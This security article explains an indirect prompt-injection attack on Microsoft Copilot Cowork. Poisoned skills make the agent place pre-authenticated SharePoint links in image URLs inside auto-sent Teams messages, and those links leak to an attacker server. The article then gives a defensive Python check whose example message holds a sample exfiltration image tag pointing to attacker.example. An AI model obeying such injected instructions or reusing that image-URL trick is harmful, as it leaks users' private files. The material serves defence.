Agentic Security: Copilot Exfiltration and AI Vulnerability Hunting
The rapid integration of autonomous AI agents into enterprise environments is exposing new security boundaries. A striking example is a vulnerability in Microsoft Copilot Cowork, in which attackers use indirect prompt injection via poisoned "skills" (custom text-based plugins) to exfiltrate sensitive files. The attack exploits a design decision in Cowork: Teams and Outlook messages addressed to the active user are sent automatically, without human confirmation. An injected instruction can therefore force the agent to retrieve pre-authenticated SharePoint download links and embed them in the URLs of malicious HTML image tags inside such a message. When the user views the message in Teams, the client automatically renders the image, and the resulting request delivers the private download links to an attacker-controlled server. The incident highlights a fundamental flaw in current LLM-agent architectures: they do not separate data from code, so granting them broad, delegable tool-calling permissions is inherently dangerous.
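One way to narrow this exfiltration channel is to inspect agent-authored messages before they are auto-sent and fall back to human confirmation when they would load images from unexpected hosts. The following is a minimal sketch of that idea in Python, not a description of how Copilot Cowork or Teams actually works: the allowlist, the host name intranet.example.com, and the function names are all hypothetical. It covers only img tags; links, CSS, and other remote-fetching markup would need similar treatment.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hypothetical allowlist of hosts the chat client may fetch images from.
ALLOWED_IMAGE_HOSTS = frozenset({"intranet.example.com"})


class _ImageSourceCollector(HTMLParser):
    """Collects the src attribute of every <img> tag in a message body."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag and attribute names before calling this.
        if tag == "img":
            for name, value in attrs:
                if name == "src":
                    self.sources.append(value or "")


def _host_of(url):
    """Return the lowercased host of a URL, or None if it cannot be determined."""
    try:
        return urlparse(url.strip()).hostname
    except ValueError:
        # Malformed URLs are treated as having no trusted host.
        return None


def untrusted_image_sources(html):
    """List image URLs in the message whose host is not on the allowlist."""
    parser = _ImageSourceCollector()
    parser.feed(html)
    parser.close()
    return [src for src in parser.sources
            if _host_of(src) not in ALLOWED_IMAGE_HOSTS]


def requires_human_approval(html):
    """Assumed policy: never auto-send a message that loads untrusted images."""
    return bool(untrusted_image_sources(html))


if __name__ == "__main__":
    message = ('<p>Your summary is ready.</p>'
               '<img src="https://attacker.example/p.png?d=secret-link">')
    print(requires_human_approval(message))
```

The sketch deliberately errs on the side of caution: relative, empty, or malformed image sources count as untrusted, so the message is held for confirmation rather than sent. A check like this reduces one exfiltration path but does not address the underlying problem that injected text can steer the agent's tool calls.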
On the defensive side, agentic workflows are demonstrating considerable power. Anthropic's Claude (working with the Mythos preview research team) discovered a critical integer overflow vulnerability in the Apple macOS kernel (CVE-2026-28952), which was subsequently patched in macOS Tahoe 26.5. The discovery has sparked a debate about the future of software maintenance. Some engineers predict a 24/7 security arms race in which dedicated agents continuously fuzz and audit codebases, forcing software publishers either to adopt a rapid "bleeding edge" update model or to double down on robust Long Term Support (LTS) releases to manage the constant influx of patches.